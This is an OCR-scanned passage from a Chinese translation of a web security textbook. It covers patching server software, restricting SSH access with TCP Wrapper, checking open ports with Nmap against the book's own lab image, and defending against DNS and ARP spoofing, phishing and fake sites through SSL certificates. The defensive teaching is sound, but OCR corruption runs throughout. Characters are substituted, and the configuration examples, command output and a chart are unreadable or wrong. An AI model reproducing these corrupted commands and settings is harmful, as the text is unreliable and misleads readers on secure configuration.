在 Web 服务 器 上 同时 运行 的 那些 不 需要 对 外 提供 服务 的 软件 ， 很 可 能 会 成 为 外 部 攻击 的 入 
口 。 而 且 这 些 不 对 外 提供 服务 的 软件 也 需要 进 漏洞 防范 措施 等 ， 会 产生 运营 成 本 。 所 以 停止 运行 
这 些 不 必要 软件 ， 既 能 降低 成 本 ， 也 能 使 系统 更 安全 。 








定期 实施 漏洞 防范 措施 
Web 服务 器 软件 及 编程 语言 等 基础 软件 也 需要 实行 漏洞 预防 措施 。 应 对 Web 服务 器 的 漏洞 
可 以 按照 下 面 的 步 又 实施 。 


前 期 设计 时 应 该 考虑 的 事 
确认 软件 支持 期 限 
决定 打 补 丁 (升级 ) 的 方法 

运营 开始 后 需要 做 的 事情 
随时 关注 漏洞 发 布 信息 
漏洞 出 现 后 调查 补丁 状况 以 及 防范 对 策 、 并 制定 对 应 计划 
执行 漏洞 对 应 计划 


令 选 定 软件 时 确认 软件 的 升级 状况 

作为 软件 漏洞 对 策 ， 可 选取 的 方法 有 打 补 丁 和 版 本 升级 两 种 。 需 要 注意 的 是 ， 很 可 能 在 网 站 
运营 期 间 ， 就 出 现 所 选用 的 软件 停止 开发 或 更 新 的 情况 。 

有 的 商用 软件 公司 会 通过 软件 支持 生命 周期 政策 ( Support Lifecycle Policy ) 的 形式 公布 软件 
的 支持 期 限 。 比 如 微软 的 服务 端 产品 都 会 保证 在 新 版 本 出 来 之 后 7 年 内 继续 提供 系统 补丁 "。 不同 
软件 公司 及 不 同 的 产品 ， 其 所 能 提供 的 软件 支持 生命 周期 政策 长 短 也 各 有 不 同 ， 需 要 在 选择 某 一 
产品 之 前 确认 清楚 。 

免费 软件 和 开源 软件 ( FLOSS ) 则 很 多 都 没有 公布 具体 的 软件 支持 生命 周期 政策 ， 这 一 点 万 
其 要 注意 。 在 选择 FLOSS 作为 基础 软件 的 时 候 ， 可 以 通过 查看 该 软件 过 去 的 升级 记录 ， 来 预测 
未 来 软件 是 否 能 得 到 可 靠 的 保障 。 

下 图 显示 了 各 PHP 的 主要 版 本 支持 情况 。 从 图 中 可 以 看 出 ，PHP4.x 系列 的 支持 期 限 为 从 
PHP5 发 布 开 始 ， 在 3 年 半 之 内 都 会 提供 技术 支持 。 





区 





















































OD http://www.microsoft.com/japan/presspass/detail.aspx?newsid=1932( 参考 日 期 : 2010 年 12 月 4 日 ) 
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图 7-2 各 PHP 主 版 本 的 支持 期 限 























一 多 一 PHP5.X 
一 号 一 PHP4.x 
一 全 一 PHP3.x S 多 
| | 
4 
3.5 年 
和 人 











1 1 1 1 1 1 1 1 1 1 1 1 
1988 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 


如 上 图 显示 的 那样 ，PHP 的 版 本 升级 还 是 很 活跃 的 。 而 另 一 方面 ， 旧 版 本 的 支持 期 限 都 比 
较 短 ， 如 果 在 网 站 运 维 中 所 使 用 的 PHP 版 本 不 被 官方 支持 了 ， 就 会 带 来 安全 上 的 隐患 。 不 光 是 
PHP， 所 有 使 用 了 FLOSS 的 都 需要 考虑 到 这 一 问题 。 

综 上 所 述 ， 如 果 基 础 软件 选择 FLOSS 的 话 ， 需 要 在 系统 开发 前 期 就 预测 到 Web 网 站 在 运 维 阶 
段 可 能 会 发 生 的 软件 版 本 升级 的 可 能 性 ， 并 针对 迁移 到 新 版 本 所 需要 的 费用 进行 运 维 上 的 预算 。 














令 确定 打 补 丁 方式 
在 选择 基础 软件 的 时 候 ， 最 好 同时 也 确定 给 软件 进行 打 补 丁 的 方法 。 基 本 上 给 软件 打 补 丁 可 
以 采用 下 面 的 方法 。 


重新 安装 最 新 版 本 的 软件 

在 源 代码 级 别 打 补丁 后 再 编译 ( Make ) 

使 用 系统 提供 的 包 管理 软件 (APT 或 者 Yum 等 ) 
使 用 补丁 软件 (Windows Update 或 者 WSUS 等 ) 


打 补 丁 的 方法 也 受 软 件 安装 方法 的 影响 。 比 如 在 使 用 包 管 理 系统 安装 的 软件 ， 打 补丁 也 需要 
通过 包 管 理 软件 来 完成 。 通 过 其 他 方法 安装 的 软件 ， 可 以 进行 单独 打 补 丁 后 编译 ,或 者 安装 新 版 
软件 的 方法 。 

此 外 ， 像 PHP 等 编程 语言 版 本 升级 后 ， 由 于 语言 本 身 的 规范 有 可 能 会 有 变更 ， 所 以 就 可 能 
会 导致 系统 运行 异常 。 因 此 在 版 本 升级 前 需要 确定 升级 的 影响 范围 ， 并 对 应 用 程序 进行 全 面 的 功 
能 测试 。 

利用 包 管 理 系 统 打 补丁 的 时 候 ， 由 于 不 会 修改 软件 本 身 的 规格 ， 而 只 是 打上 Bug 或 漏洞 修 
复 补丁 ， 所 以 由 此 导致 应 用 程序 不 能 正常 工作 的 可 能 性 比较 低 。 与 之 相对 应 的 ， 包 管理 系统 提供 
的 软件 的 版 本 一 般 都 会 比 最 新 的 版 本 稍微 旧 一 些 。 但 是 根据 Linux 的 发 行 版 本 不 同 ， 也 有 的 包 管 
理 系统 都 会 提供 最 新 版 本 的 软件 ( Fedora 等 )。 

可 见 ， 上 述 所 说 的 给 软件 打 补 丁 的 方法 各 有 利弊 ， 软 件 的 安装 方法 不 同 ， 打 补丁 的 方式 也 不 
同 。 这 就 需要 在 选 定 某 一 软件 的 时 候 ， 要 同时 确认 软件 的 安装 方法 以 及 打 补 丁 的 方法 。 

下 面 是 在 本 书 附带 的 漏洞 系统 镜像 系统 (请 到 本 书 的 支持 页 面 下 载 : http://www.ituring.com.cn/ 
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book/1249 ) 里 进行 软件 升级 的 例子 。apt-get 命令 是 Ubuntu 或 Debian 等 Linux 发 行 版 本 采用 的 包 
管理 程序 APT 的 一 个 命令 。 带 有 下 划 线 的 部 分 是 需要 在 命令 行 输入 的 命令 。 


会 执行 示例 “在 漏洞 系统 镜像 系统 里 进行 软件 升级 的 例子 


WT elole] AON Tolele) SH ib lo lo t= esete (3 belo ke 


[sudo] password for wasbook: 输入 密码 wasbook 


命中 http://jp.archive.ubuntu.com lucid Release.gp9 
正在 读 取 软件 包 列 表 . . .完成 


wasbook@wasbook: ~$ sudo apt-get upgrade 
正在 读 取 软 件 包 列表 . . .完成 

正在 分 析 软 件 包 的 依赖 关系 树 

正在 读 取 状态 信息 . . .完成 


MTjeielejigo Telele) SH 





Fedora 以 及 CentOS、Red Hat Enterprise Linux 等 Linux 发 行 版 本 都 采用 Yum 作为 包 管理 系 
统 。 关 于 包 管理 系统 的 详细 说 明 请 参考 关于 Linux 的 书籍 。 


令 关注 各 种 漏洞 相关 信息 

每 天 都 会 有 各 种 系统 漏洞 被 发 现 ， 每 天 也 都 会 公开 应 对 的 方法 或 者 安全 补丁 。 为 了 保证 
Web 网 站 的 安全 性 ， 需 要 关注 各 种 相关 软件 的 漏洞 信息 ， 并 实时 采取 对 应 措施 。 

各 种 漏洞 信息 一 般 会 通过 Web 站 点 或 者 邮件 列表 公布 。 在 Web 应 用 开始 运营 之 前 ， 就 需要 
确定 如 何 收集 这 些 软件 漏洞 信息 ， 建 立 能 及 时 监视 这 些 漏洞 信息 的 体制 。 

下 面 列举 了 一 些 发 布 漏洞 信息 的 权威 网 站 。 除 了 关注 应 用 程序 所 采用 软件 的 漏洞 信息 之 外 ， 
最 好 也 能 对 这 些 网 站 保持 关注 。? 
© JVN (Japan Vulnerability Notes ) 

http://jvn.jp 
全 JvN ipedia 漏洞 信息 数据 库 

http://jvndb.jvn.jp/ 

不 管 哪个 网 站 都 提供 了 RSS 订阅 功能 。 订 阅 了 这 些 RSS 的 话 ， 将 对 及 时 获取 各 种 信息 有 很 
大 帮助 。 


4 确认 漏洞 后 调查 补丁 状况 以 及 防范 对 策 、 并 制定 对 应 计划 
在 确认 漏洞 信息 之 后 ， 按 照 如 下 步骤 制定 漏洞 对 应 计划 。 


WooYun ( 国内 ) : http:/www.wooyun.org/ 
SecurityFocus (国外 ) : http://www.securityfocus.com/ 
National Vulnerability Database ( 国外 ) : http://nvd.nist.gov/ 








译 者 注 
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. 是 否 在 使 用 存在 漏洞 的 软件 

确认 此 漏洞 导致 的 影响 ， 讨 论 是 和 否 需要 针对 此 漏洞 采取 应 对 措施 
. 决定 应 对 方法 

. 制定 详细 的 实施 计划 








站 
给 系统 市 来 影响 ， 这 时 候 可 以 采取 只 要 系统 使 用 着 出 现 漏洞 的 软件 ， 一律 打 补丁 、 升 级 。 
漏洞 的 应 对 方法 ， 有 以 下 3 种 方式 。 


安装 修正 程序 或 安全 补丁 (根本 性 解决 方法 ) 
升级 到 解决 了 漏洞 的 新 版 本 (根本 性 解决 方法 ) 
采取 回避 对 策 (临时 措施 ) 


这 里 所 说 的 回避 对 策 ， 是 指 通 过 采取 修改 配置 等 方法 来 达到 系统 不 受 漏洞 影响 的 目的 。 回 避 
措施 一 般 是 在 安全 补丁 还 没有 公布 ， 或 者 补丁 的 可 靠 性 没有 得 到 验证 而 不 能 打 人 补丁 等 情况 下 ， 
作为 临时 措施 来 施行 。 

在 实施 计划 中 ， 需 要 确定 以 下 事项 。 

在 测试 环境 验证 ( 是否 需 要 重启 服务 器 ， 应 用 程序 是 否 正 常 运行 ,切换 回 老 系统 方法 的 
确认 ) 

实施 日 程 表 

Web 网 站 停止 服务 公告 

服务 器 的 备份 步 又 

实施 项 目的 详细 化 

实施 后 验证 方法 的 详细 化 

创建 实施 步骤 及 检查 表 ( Check List ) 


上 面 描述 的 是 一 个 比较 完整 的 实施 计划 。 如 果 现 实情 况 允 许 短 时 间 停止 Web 服务 器 ， 则 可 
以 省 略 在 测试 环境 上 的 验证 步 又， 而 直接 在 正式 环境 下 打 补 丁 。 此 外 ， 还 可 能 存在 不 能 准备 测 
试 环境 的 情况 。 不 管 哪 种 情况 ， 都 需要 在 打 补 丁 之 前 进行 完整 的 备份 ， 以 防 打 补丁 后 发 生 系统 
故障 。 


前 面 两 步 主要 讨论 是 否 有 对 此 漏洞 采取 应 对 措施 的 必要 性 ， 有 时 候 会 很 难 判断 漏洞 是 否 会 


| 






































执行 漏洞 对 应 计划 

制订 了 漏洞 应 对 计划 后 ， 只 要 按 计 划 执 行 就 可 以 了 。 

打 补 丁 或 者 版 本 升级 结束 之 后 ， 需 要 记录 工作 记录 ， 同 时 在 系统 环境 构成 表 ( 系统 架构 说 明 
文档 ) 里 修改 更 新 过 的 各 模块 ， 记 录 相 关 软 件 的 最 新 版 本 等 信息 。 
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对 不 需要 对 外 公开 的 端口 或 服务 加 以 访问 限制 

SSH 服务 (sshd ) 或 FTP 服务 作为 对 服务 器 进行 管理 的 常用 软件 ， 不 能 随意 停止 其 服务 运 
行 ， 但 是 可 以 通过 增加 对 这 些 服务 的 访问 限制 ， 来 提高 系统 的 安全 性 。 

即使 不 是 有 名 的 网 站 ， 只 要 接 入 到 网 络 中 ，SSH 或 FTP 等 端口 也 会 受到 来 自 世 界 各 地 的 攻 
击 。 对 这 些 端口 加 以 访问 上 的 限制 ， 可 以 有 效 的 抵御 这 种 无 差别 攻击 。 具 体 的 方法 有 下 面 两 种 。 


> 只 允许 来 自 专 线 或 者 VPN 的 连接 
> 只 允许 来 自 指定 卫 的 访问 


其 中 限定 卫 的 方法 有 下 面 几 种 。 


> 在 网 络 入 库 的 路 由 或 者 防火 墙 上 进行 IP 限制 设置 

> 利用 服务 器 OS 自 带 的 功能 ( Windows 防火 墙 , 或 者 iptables 、TCP Wrapper 等 ) 进行 IP 
限制 

> 利用 软件 自身 的 访问 限制 功能 


下 面 的 例子 是 使 用 TCP Wrapper 来 限制 只 有 本 地 网 络 才能 访问 sshd 服务 的 例子 。 首 先 在 / 
etc/hosts.deny 文件 里 禁止 所 有 的 访问 请 求 ， 之 后 在 /etc/hosts.allow 文件 里 设置 允许 来 自 本 地 网 络 
的 访问 请 求 。 在 需要 通过 网 络 进行 系统 维护 的 时 候 ， 最 好 使 用 固定 卫 访问 服务 器 ， 并 在 服务 器 
里 对 访问 卫 进行 限制 ， 这 是 非常 安全 的 方法 。 


和 合 执行 示例 ”使 用 TCP Wrapper 对 sshd 进行 访问 限制 设置 


$ cat /etc/hosts.deny 
SSshd: ALD 


$ cat /etc/hosts.allow 
SEO To Gos 0 0 2 0b S50 
$ 





如 果 出 口 IP 不 是 固定 IP 的 话 ， 建 议 在 最 小 范围 内 限制 能 访问 服务 器 的 卫 。 笔 者 由 于 需要 在 
公司 外 面 对 Web 服务 顺 进 行 远程 维护 ， 所 以 我 在 配置 文件 里 指定 了 ISP 的 域名 ,来 设置 能 访问 
服务 器 的 远程 连接 请 求 ( 图 中 ISP 的 域名 为 非 真 实 域名 )。 


S$ cat /etc/hosts .allow 


sshd: *.example.ne.jp 通过 设置 |SP 的 域名 来 设置 访问 限制 
So 家 里 的 IP 地 址 








通过 查看 服务 器 的 日 志 ( /var/log/secure ) 可 以 发 现 ， 针 对 SSH 服务 器 的 大 部 分 攻击 都 是 来 自 
国外 的 耳 地 址 ， 所 以 上 面 的 设置 能 遮 断 大 部 分 的 攻击 请 求 。 尽 管 如 此 ， 也 还 是 存在 绕 过 IP 地址 
限制 的 可 能 性 的 ， 这 个 问题 可 以 请 参考 后 面 的 关于 强化 认证 功能 的 章节 。 
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令 通过 端口 扫描 确认 各 端口 服务 状态 

可 以 通过 端口 扫描 工具 来 方便 的 验证 访问 限制 是 否 有 效 。 下 面 的 图 7-3 就 是 使 用 端口 扫描 
工具 Nmap”( Windows 版 ) 对 本 书 附带 的 Linux 镜像 进行 端口 扫描 的 结果 ( 默认 设置 时 的 结果 )。 
Nmap 是 有 名 的 端口 扫描 工具 ， 而 且 是 一 个 开源 软件 。 


7-3 ”端口 扫描 
































全 Zenmap 


EL 





Scan Iools profile Help 








Target: | example.jp 


Command: |nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 example.jp | 











回国 Ed 


回 Profile: | Intense scan 

















Services | |Nmap output| ports/ Hosts Topology | Host Details | Scans 









































OS 4 Host 4 Port 4 Protocol 4 State 4 Service 4 Version 1 
妇 ”example.jp (1 © 22 tcp open ssh OpenSSH 5.3pl Debian 3ubuntu4 (protocol 2.0) 

四 25 tcp open smtp 
上 80 tcp open http Apache httpd 2.2.14 ((Ubuntu)) 
四 110 tcp open pop3 Dovecot pop3d 
四 443 tcp open http Apache httpd 2.2.14 ((Ubuntu)) 

a ， @ 995 tcp open pop3 Dovecot pop3d 

= | 











从 上 图 可 以 看 出 ， 这 个 系统 一 共 


运行 着 SSH、SMTP、HTTP、POP3 等 4 种 服务 2。 这 其 中 


SSH 是 不 需要 对 外 部 公开 的 端口 ， 所 以 需要 按照 前 面 介绍 过 的 方法 进行 访问 上 的 限制 。 
此 服务 器 内 同时 还 运行 着 PostgreSQL 服务 ,但 是 Nmap 的 扫描 结果 并 没有 显示 出 来 。 这 说 
明 PostgreSQL 不 会 接受 来 自 外 部 的 连接 请 求 。 


下 面 图 7-4 显示 的 则 是 对 笔者 个 人 研究 用 的 Windows Server 进行 端口 扫描 的 结果 。 


7-4 ”对 笔者 的 研究 用 服务 器 进行 端口 扫描 的 结果 





r 
全 Zenmap 





Scan Tools Profile Help 





Target' | labol 








加 Profile: [Intense scan 加 [gean] 


| Cancel 





Command: | nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 labol 

















Eee Services Nmap Qutput| Ports/ Hosts Topology | Host Detalls Scans 























四 


0Ss 4 Host 
本 labol (192.168,1 




















Port 4 Protocol 4 State 4 Service 4 Yersion 


tcp open http Apache httpd 2,2.13 ((Win32) PHP/5.3.0) 

tcp open http Microsoft IIS webserver 6.0 

tcp open msrpc Microsoft Windows RPC 

tcp open netbios-ssn 

tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 

tcp open msrpc Microsoft Windows RPC 

tcp open msrpc Microsoft Windows RPC 

tcp open http IBM Tivoli Monitoring http config (KDH httpd 6100.4 d7324a) 
tcp open http IBM Tivoli Monitoring http config (KDH httpd 6100,4 d7324a) 
tcp open ms-sql-s Microsoft SQL Server 2008 10,0.1600; RTM 

tcp open mysql MySQL (unauthorized) 

tcp open microsoft-rdp Microsoft Terminal Service 

tcp open ajpl3 Apache Jserv (Protocol v1,3) 

tcp open http Apache Tomcat/Coyote ]SP engine 1,1 




















OD http://nmap.org/ 


加 443 端口 为 HTTPS 所 使 用 ，Nmap 的 画面 上 都 显示 为 HTTP。 
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笔者 这 台 研 究 用 服务 开 着 很 多 端口 接受 来 自 外 部 的 连接 请 求 ， 如 果 这 样 的 状态 直接 接 入 公 网 
的 话 ， 是 非常 危险 的 。 然 而 根据 笔者 进行 安全 咨询 的 经 验 ， 像 这 样 开 着 很 多 端口 的 服务 右 还 是 时 
不 时 地 能 见 到 的 。 

Web 网 站 在 运营 时 需要 提供 哪些 服务 ， 开 放 哪些 端口 ， 最 好 在 前 期 设计 的 时 候 就 设计 好 ， 然 
后 在 系统 投入 运营 之 前 ， 利 用 端口 扫描 等 工具 进行 开放 端口 检查 ?。 




















提高 认证 强度 
前 面 已 经 说 过 ， 系 统管 理 用 的 软件 应 该 对 访问 来 源 的 卫 地 址 进行 严格 的 限制 ， 然 而 这 是 不 
够 的 ， 还 需要 加 强 管理 用 软件 的 用 户 认 证 强度 。 具 体 可 以 采取 以 下 措施 。 


删除 或 者 停止 Telnet 和 FTP 服务 ， 只 使 用 SSH 服务 
在 SSH 服务 中 使 用 公 钥 认证 方式 来 代替 密码 认证 


说 起 Telnet 和 FTP 的 问题 ， 一 般 人 都 会 想到 到 非 加 密 通信 ， 然 而 笔者 认为 最 大 的 问题 应 该 
是 没有 采用 高 强度 的 认证 方式 。 像 之 前 说 到 的 那样 ， 针 对 Telnet、FTP、SSH 等 的 密码 暴力 破解 
攻击 一 直 存在 。 即 使 使 用 了 SSH， 在 采用 用 户 / 密码 作为 认证 方式 这 一 点 上 ，SSH 和 Telnet 等 并 
没有 太 大 的 差异 ， 强 烈 建议 使 用 公 钥 认证 方式 。 





























中 ”端口 扫描 要 检查 的 是 对 外 部 网 络 访问 开放 的 端口 ， 需 要 使 用 接 入 到 外 网 环境 进行 扫描 。 
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7.2 防范 伪装 攻击 的 对 策 








网 站 伪装 攻击 也 是 Web 网 站 的 常见 威胁 之 一 。 网 站 伪装 是 指 攻击 者 将 准备 好 的 攻击 网 站 通 
过 一 定 手段 伪装 成 正规 网 站 ， 诱 线 用 户 访问 。 通 过 网 站 伪装 攻击 ， 可 以 达到 竹 改 正规 网 站 内 容 ， 
或 者 盗 取 用 户 信息 的 目的 。 本 节 将 先 对 网 站 伪装 的 常见 方法 进行 说 明 ， 然 后 再 讲述 如 何 防 范 网 站 
伪装 攻击 。 

网 站 伪装 主要 有 两 种 方法 ， 一 种 是 网 络 级 别 的 伪装 ， 一 种 是 只 复制 网 站 外 观 的 钓鱼 方式 。 



















































































7.2.1 网 络 伪装 的 手段 


本 节 将 主要 针对 网 络 级 别 的 伪装 攻击 进行 说 明 ， 我 们 将 通过 以 下 这 些 曾 经 在 网 络 上 公开 报道 
的 真实 事例 来 介绍 。 
针对 DNS 服务 器 的 攻击 
ARP 欺骗 攻击 








针对 DNS 服务 器 的 攻击 
针对 对 DNS 服务 器 的 攻击 主要 有 以 下 几 种 类 型 。 


通过 发 动 对 DNS 服务 器 的 攻击 来 蔡 换 DNS 的 配置 
DNS 缓存 污染 攻击 
购 入 已 过 期 域名 做 非法 之 用 


就 在 本 书 的 编写 期 间 ，2010 年 11 月 丹麦 的 著名 安全 公司 Secunia 的 网 站 (http://secunia. 
com/ ) 发 生 了 DNS 内 容 被 改写 的 事故 "， 致 使 用 户 访问 了 被 攻击 者 替换 后 的 内 容 。 这 次 攻击 虽然 
没有 带 来 很 大 的 损失 ,但 是 如 果 攻 击 者 想 做 的 话 ， 可 以 通过 放出 虚假 的 漏洞 信息 来 诱骗 用 户 下 载 
伪装 为 正规 防 病毒 软件 的 恶意 软件 ， 不 难 想象 这 将 会 带 来 非常 大 的 损失 。 

DNS 缓存 污染 攻击 则 是 指向 用 户 使 用 的 DNS 缓存 服务 器 不 停 的 发 送 查 询 请 求 ， 然 后 抢 在 
DNS 缓存 服务 需 的 应 答 到 来 之 前 ， 向 客户 端 发 送 伪装 的 应 答 。 这 样 客户 端 得 到 的 Web 服务 器 的 
卫 就 是 攻击 者 准备 的 伪装 服务 器 的 卫 地 址 了 。 这 之 后 ,用 户 就 开始 和 伪装 网 站 进行 通信 了 。 

关于 如 何 去 防 范 针 对 DNS 服务 需 的 攻击 ， 我 们 将 在 7.2.3 节 里 进行 说 明 。 





















































QD ”http://secunia.com/blog/153/( 参考 日 期 : 2010 年 11 月 28) 
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专栏 : VISA 域名 问题 COLUMN 


“VISA 域名 问题 ”是 一 个 众所周知 的 失效 域名 问题 的 例子 。 
原本 VISA.CO.JP 的 域名 是 由 域名 管理 商 E-ONTAP.COM 负责 解析 的 ， 但 是 后 来 E-ONTAP. 
COM 破产 了 ， 所 以 E-ONTAP.COM 这 个 域名 也 就 失效 了 ， 变 成 了 任何 人 都 可 以 申请 的 状态 。 但 



































是 这 时 候 VISA.CO.JP 的 第 二 域名 服务 器 还 是 指向 E-ONTAP.COM 的 域名 服务 器 ， 没 有 做 任何 
修改 。 

如 果 是 有 人 恶意 买 入 了 E-ONTAP.COM 域名 的 话 ， 就 可 以 利用 其 对 VISA.CO.JP 域名 的 解 
析 权 去 做 非法 的 事情 了 ， 还 好 中 京 大 学 的 副教授 铃木 常 彦 意识 到 了 这 个 问题 后 买 入 了 这 个 域名 ， 
最 后 没有 发 生 事故 。 

VISA 域名 问题 虽然 说 是 域名 管理 企业 的 域名 失效 导致 的 问题 ， 但 是 现实 中 也 存在 自己 的 域 
名 过 期 失效 后 被 第 三 者 买 入 的 实例 。 建 议 在 公司 级 别 上 指定 针对 域名 管理 的 相关 规定 ， 比 如 指定 
专门 的 域名 管理 人 员 ， 决 定好 如 何 交接 等 问题 。 














































































































ARP 欺骗 攻击 


ARP 欺骗 是 指 通过 发 送 伪 造 的 ARP ( Address Resolution Protocal ) 应 答 ， 以 达到 伪装 成 其 他 
IP 地 址 的 目的 。 利 用 ARP 欺骗 进行 网 站 伪装 攻击 时 ， 当 被 攻击 服务 器 问 网 络 发 送 网 关 IP 地 址 的 
MAC 请 求 ( ARP 请 求 ) 时 ， 攻 击 者 会 抢先 返回 伪造 的 ARP 应 答 , 来 冒充 网 关 ， 从 而 截获 所 有 与 
服务 器 的 通信 内 容 。ARP 欺骗 攻击 有 一 个 限制 条 件 ， 就 是 要 和 被 攻击 服务 器 在 同一 物理 网 段 内 。 

2008 年 6 月 某 著名 网 站 托管 企业 的 数据 中 心 发 生 的 安全 事故 ， 就 是 由 于 ARP 欺骗 攻击 导致 
的 攻击 案例 。 在 此 次 事故 中 ， 托 管 中 的 一 台 服 务 器 由 于 感染 了 恶意 软件 ， 从 而 导致 了 同一 网 段 内 
发 生 了 ARP 坎 骗 攻击 。 由 于 被 攻击 的 服务 器 内 容 里 被 加 入 了 iframe 内容 ， 进 而 又 导致 了 查看 了 
被 攻击 网 站 网 页 的 用 户 也 被 感染 了 恶意 软件 。 

关于 防范 ARP 欺骗 攻击 的 对 策 ， 我 们 将 在 7.2.3 节 里 进行 说 明 。 






































7.2.2 ”钓鱼 攻击 


钓鱼 ( Phishing ) 是 指 创建 一 个 和 原 网 站 非常 像 的 网 站 ， 然 后 通过 邮件 等 发 送 链接 ， 诱 骗 用 
户 访问 这 个 假 网 站 并 让 用 户 在 假 网 站 上 输入 用 户 名 、 密 码 或 其 他 个 人 信息 ， 从 而 达到 收集 个 人 信 
息 的 目的 。 钓 鱼 比 起 网 络 级 别 的 伪装 (DNS 攻击 或 者 ARP 欺骗 攻击 ) 来 说 显得 技术 含量 不 是 很 
高 ， 但 是 经 常 有 用 户 上 当 遭 受 损 失 。 在 日 本 也 经 常 出 现 一 些 复 制 若 名 二 手 货 交 易 网 站 或 者 SNS 
网 站 的 钓鱼 网 站 。 

钓鱼 攻击 原则 上 和 正规 网 站 没有 什么 直接 关系 ， 但 每 个 网 站 的 用 户 都 有 可 能 被 钓鱼 网 站 其 
骗 。 尽 管 预防 钓鱼 网 站 还 主要 靠 用 户 自 己 来 防范 ， 但 是 作为 网 站 方面 ， 也 应 该 采取 一 定 的 措施 来 
帮助 用 户 预 防 钓鱼 网 站 。 具 体 的 内 容 我 们 将 会 在 下 一 节 进 行 说 明 。 
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7.2.3 ”Web 网 站 的 伪装 攻击 对 策 
防范 针对 Web 网 站 的 伪装 攻击 ， 可 以 采取 下 面 的 措施 。 
网 络 层 的 对 策 


使 用 SSL/TLS 
使 用 便于 记忆 的 域名 


下 面 按 顺 序 对 这 儿 项 进行 说 明 。 


网 络 层 的 对 策 
在 7.2.1 节 里 我 们 已 经 说 过 ， 网 络 层 的 伪装 攻击 主要 通过 ARP 欺骗 攻击 和 对 DNS 服务 器 的 
攻击 来 进行 。 虽 然 完 全 抵御 这 些 攻击 比较 困难 ， 但 我 们 还 是 可 以 采取 如 下 措施 的 。 


同一 网 段 内 不 放置 可 能 存在 漏洞 的 服务 器 
由 于 ARP 欺骗 攻击 局 限于 在 同一 网 段 之 内 ， 所 以 在 网 段 内 不 放置 可 能 存在 安全 漏洞 的 服务 
器 是 其 对 策 之 一 。 也 就 是 说 ， 对 同一 网 段 的 机 器 ， 不 管 其 作用 及 重要 程度 如 何 ， 都 应 该 一 视 同 仁 
地 实行 安全 漏洞 防范 措施 。 
如 果 租用 的 服务 需 在 同一 网 段 内 还 有 其 他 公司 的 服务 器 的 话 ， 最 好 向 提供 托管 服务 的 公司 咨 
询 一 下 他 们 预防 ARP 欺骗 攻击 的 情况 。 






































令 强化 DNS 运 维 
DNS 是 互联 网 最 基本 的 服务 之 一 ， 但 仍然 会 经 常 由 于 配置 错误 或 者 漏洞 导致 DNS 问题 出 
现 。 如 何 去 安 全 的 管理 、 维 护 一 个 DNS 服务 器 ， 可 以 参考 下 面 我 们 罗列 出 来 的 DNS 的 书籍 以 及 
独立 行政 法 人 信息 处 理 推进 机 构 ( IPA ) 的 内 容 。 另 外 ， 也 可 以 考虑 将 来 使 用 DNSSEC。 
DNS 缓存 污染 攻击 主要 需要 用 户 本 身 去 防范 ， 作 为 参考 ， 我 们 一 并 将 DNS 缓存 污染 攻击 的 
相关 资料 也 列 了 出 来 。” 
人 9 关于 域名 注册 和 DNS 服务 器 配置 的 注意 事项 
http://www.ipa.go.jp/security/vVuln/20050627_dns.html 
人 DNS 缓存 污染 攻击 对 策 (正文 为 PDF 格式 ) 
http:/www.ipa.go.jp/security/vuln/DNS security.html 


























QD 中 文 的 相关 参考 资料 有 : 
维基 百科 上 关于 “域名 服务 器 缓存 污染 ”的 介绍 : http://en.wikipedia.org/wiki/DNS_spoofing 
DNS 缓存 投 毒 攻击 原理 与 防御 策略 : http:/www.chinacommunications.cn/fileup/PDF/2009-6-4-003.pdf 
DNS 相关 的 攻击 介绍 : http://www.freebuf.com/articles/network/17150.html 





译 者 注 
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1 Wy J so YY -am 一 上 
人 3 关于 DNS 缓存 污染 攻击 漏洞 的 注意 事项 





http://www.ipa.go.jp/security/vuln/documents/2008/200809 DNS.html 


A 注意 关于 DNS 服务 器 的 漏洞 的 再 次 提醒 


http://www.ipa.go.jp/security/vuln/documents/2008/200812 DNS.html 


引入 SSLATLS 


SSL (Secure SocketsLayer ) 和 TLS ( TransportLayer Security 


) 也 是 防范 Web 网 站 伪装 攻 


击 的 有 效 对 策 。 在 下 面 的 说 明 中 我 们 把 这 两 个 词 统称 为 SSL。 提 起 SSL 大 家 的 第 一 印象 一 般 
是 用 来 进行 加 密 通 信 的 ， 但 是 它 还 有 另 一 个 重要 的 功能 ， 就 是 通过 第 三 方 机 构 ( Certification 
Authority， 认 证 中 心 ) 来 验证 域名 的 合法 性 。 如 果 Web 网 站 的 管理 员 和 用 户 都 能 熟练 的 使 用 SSL 

















的 话 ， 那 么 就 可 以 通过 SSL 来 达到 防范 网 站 伪装 攻击 的 目的 。 
作为 网 站 的 管理 人 员 ， 正 确 使 用 SSL 功能 的 第 一 步 就 购买 合法 
书 的 网 站 域名 会 由 认证 中 心 来 公证 其 合法 性 。 即 使 Web 网 站 被 伪装 


的 数字 证 书 。 购 买 了 合法 证 
攻击 了 ， 那 么 用 户 也 可 以 通 








过 浏览 需 的 警示 意识 到 访问 了 假冒 网 站 。 图 7-5 显示 的 是 Internet Explorer 9 的 数字 证 书 错误 的 页 





面 。 这 也 可 以 通过 在 本 书 的 模拟 环境 提供 的 虚拟 机 中 启动 浏览 器 访问 https://example.jp/ 来 确认 。 
7-5 ”访问 证 书 有 问题 时 网 站 的 警告 
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图 


电子 证 书 可 以 有 效 地 对 网 站 伪装 攻击 进行 防范 ,但 如 果 只 是 以 抵抗 钓鱼 攻击 为 目的 ， 则 可 以 





价格 从 低 到 高 的 顺序 排列 。 





根据 电子 证 书 的 种 类 不 同 采取 不 同 的 使 用 方式 。 现 在 能 购买 到 的 证 书 种 类 有 以 下 几 种 ， 下 面 是 按 
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域名 认证 证 书 
组 织 认 证 证 书 
EV-SSL 证 书 


域名 认证 证 书 的 组 织 名 一 栏 里 会 显示 域名 本 身 ， 不 会 对 组 织 名 做 认证 。 组 织 认证 证 书 则 会 在 
组 织 栏 里 显示 企业 、 团 体 名 称 ， 以 及 个 人 姓名 等 。EV-SSL 证 书 则 会 根据 CA/Browser Forum 制定 
的 标准 2 对 企业 的 真实 性 进行 验证 。 
使 用 EV-SSL 会 很 容易 分 辨 出 伪装 的 网 站 。 图 7-6 显示 的 是 通过 HTTPS 协议 访问 verisign 公 
司 网 站 时 的 页 面 。 这 时 候 浏 览 絮 的 地 址 栏 会 变 成 绿色 ,并 且 右 侧 多 了 一 个 带 锁 头 图 标的 显示 区 
